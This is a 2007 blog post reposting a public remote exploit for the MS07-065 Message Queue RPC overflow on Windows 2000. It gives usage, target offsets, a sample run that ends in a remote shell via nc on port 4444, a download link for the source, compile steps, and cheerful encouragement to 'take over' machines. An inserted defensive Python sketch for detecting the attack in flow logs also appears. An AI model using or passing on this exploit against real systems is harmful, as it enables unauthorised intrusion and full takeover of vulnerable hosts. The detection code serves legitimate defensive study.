Friday, December 21, 2007

Hack 0x05 : New Exploit (22-12-2007) for Windows 2000

By Dendi Suhubdy A.K.A Cron of NuLL


******** Microsoft Message Queue POC exploit ( MS07-065 )**********

Mario Ballano - (mballano~gmail.com) - http://www.48bits.com

Andres Tarasco - (atarasco~gmail.com) - http://www.tarasco.org

*********************************************************************

* Original Advisory:

http://www.zerodayinitiative.com/advisories/ZDI-07-076.html

* Microsoft Bulletin :

http://www.microsoft.com/technet/security/bulletin/ms07-065.mspx

* CVE Code: CVE-2007-3039

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3039

* Timeline:

No naked news this time, just rum and whiskey

* Additional information:

From Microsoft support (http://support.microsoft.com/?id=178517): RPC dynamic RPC ports for MQ 2101, 2103, 2105

HSC of course http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_msmq.html

Dave's unmidl http://www.immunitysec.com/resources-freesoftware.shtml

* How to compile: Call your favorite SetEnv.Cmd from the Microsoft SDK and then exec nmake.

* Note: There are several RPC ports to trigger the overflow. If you hit a system, it looks like you'll need to send the exploit twice or specify another port (-p) to exploit it again.

There is a chance that offsets are invalid for Windows 2000 Server (only Spanish Win2k Advanced Server was tested). Adjust them if needed.

Usage:

C:\Programación\MessageQueue>MessageQueue.exe

--------------------------------------------------------------

Microsoft MessageQueue local & remote RPC Exploit code

Exploit code by Andres Tarasco & Mario Ballano

Tested against Windows 2000 Advanced server SP4

--------------------------------------------------------------

Usage (how to use the exploit)

MessageQueue.exe -h hostname [-d Dnssuffix] [-n netbiosname] [-p port] [-t lang]

Targets:

0 (0x6bad469b) - Windows 2000 Advanced server English (default - untested)

1 (0x6b9d469b) - Windows 2000 Advanced server Spanish

2 (0x41414141) - Windows 2000 Advanced server crash

C:\Programación\MessageQueue>MessageQueue.exe -h 192.168.1.39

--------------------------------------------------------------

Microsoft MessageQueue local & remote RPC Exploit code

Exploit code by Andres Tarasco & Mario Ballano

Tested against Windows 2000 Advanced server SP4

--------------------------------------------------------------

//example of the screen display when the exploit is launched......

[+] Binding to ncacn_ip_tcp:192.168.1.39

[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0

[+] RPC binding string: ncalrpc:[LRPC00000414.00000001]

[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0

[+] RPC binding string: ncalrpc:[QMsvc$testserver]

[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0

[+] RPC binding string: ncalrpc:[QmReplService]

[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0

[+] RPC binding string: ncalrpc:[QMMgmtFacility$testserver]

[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0

[+] RPC binding string: ncacn_ip_tcp:192.168.1.39[1222]

[+] Using gathered netbios name: testserver

[+] Dynamic MessageQueue rpc port found (1222)

[+] Connecting to fdb3a030-065f-11d1-bb9b-00a024ea5525@ncacn_ip_tcp:192.168.1.39[1222]

[+] RpcBindingFromStringBinding success

[+] Trying to fingerprint target...

[+] Fqdn name obtained from netbios packet: testserver.local

[+] Remote OS Fingerprint (05.00)

[+] Remote Host identified as Windows 2000

[+] Sending POC Exploit code to QMCreateObjectInternal()

[+] Try to connect to remote host at port 4444 for a shell

C:\>nc 192.168.1.39 4444

Microsoft Windows 2000 [Versión 5.00.2195]

(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32> ///BRAVOOOOOOOOO, THE FIESTA BEGINS HERE....every possible attack is now open!!!!!!!!!!!
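From a defender's side, the run above leaves a recognisable sequence in network telemetry: an endpoint-mapper lookup and RPC bind to the MSMQ interface UUID, then a connection to the exploit's bind shell on port 4444. The following Python sketch is an added example (not part of the original post or the exploit authors' code) that correlates those two events per source/target pair over a constructed, hypothetical flow-log format; the UUID, the static MSMQ ports and the shell port are the values quoted on this page.

```python
from datetime import datetime, timedelta

# MSMQ Queue Manager RPC interface UUID, as reported in the exploit output above.
MSMQ_IFACE_UUID = "fdb3a030-065f-11d1-bb9b-00a024ea5525"
# Static MSMQ RPC ports from the Microsoft support note, plus the exploit's bind-shell port.
MSMQ_STATIC_PORTS = {2101, 2103, 2105}
SHELL_PORT = 4444
WINDOW = timedelta(seconds=60)  # max gap between MSMQ bind and shell connect to correlate

# Constructed sample flow log (hypothetical "HH:MM:SS src dst dport event detail" format).
SAMPLE_LOG = """\
10:00:01 192.168.1.10 192.168.1.39 135 epm_lookup fdb3a030-065f-11d1-bb9b-00a024ea5525
10:00:01 192.168.1.10 192.168.1.39 1222 rpc_bind fdb3a030-065f-11d1-bb9b-00a024ea5525
10:00:03 192.168.1.10 192.168.1.39 4444 tcp_connect -
10:05:00 192.168.1.20 192.168.1.39 135 epm_lookup fdb3a030-065f-11d1-bb9b-00a024ea5525
10:05:00 192.168.1.20 192.168.1.39 2103 rpc_bind fdb3a030-065f-11d1-bb9b-00a024ea5525
10:30:00 192.168.1.30 192.168.1.39 4444 tcp_connect -
"""

def parse(log):
    """Yield (time, src, dst, dport, event, detail) from the sample format; skip bad lines."""
    for line in log.splitlines():
        fields = line.split()
        if len(fields) != 6:
            continue
        ts, src, dst, dport, event, detail = fields
        yield datetime.strptime(ts, "%H:%M:%S"), src, dst, int(dport), event, detail

def is_msmq_bind(dport, event, detail):
    """RPC bind to the MSMQ interface, on a static port or an EPM-assigned dynamic one."""
    return event == "rpc_bind" and (detail == MSMQ_IFACE_UUID or dport in MSMQ_STATIC_PORTS)

def detect(log):
    """Return (src, dst, time) for each connect to SHELL_PORT that follows an MSMQ bind from
    the same source to the same target within WINDOW. A lone MSMQ bind (normal client
    traffic) or a lone connect to 4444 with no preceding MSMQ bind is not reported."""
    last_bind, alerts = {}, []
    for ts, src, dst, dport, event, detail in parse(log):
        if is_msmq_bind(dport, event, detail):
            last_bind[(src, dst)] = ts
        elif event == "tcp_connect" and dport == SHELL_PORT:
            bind_ts = last_bind.get((src, dst))
            if bind_ts is not None and ts - bind_ts <= WINDOW:
                alerts.append((src, dst, ts.strftime("%H:%M:%S")))
    return alerts

if __name__ == "__main__":
    for src, dst, when in detect(SAMPLE_LOG):
        print(f"[!] possible MS07-065 exploitation: {src} -> {dst}, shell connect at {when}")
```

Only the first client in the sample is reported; the second is an ordinary MSMQ bind and the third connects to 4444 without any MSMQ context.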

Special thanks to Andres Tarasco and Mario Ballano.........

Source code here ok........

http://www.milw0rm.com/sploits/2007-MessageQueue.zip

If you have programming skills, it is worth trying to analyse the source code; but if you don't and you really want to try taking over a Win2k box, you just compile it: open the command line, change to the directory with the source code, type "nmake" and press Enter (he…he..=)))...…don't forget that you must install Visual C++ to compile the code....

Cheers and happy exploiting.........

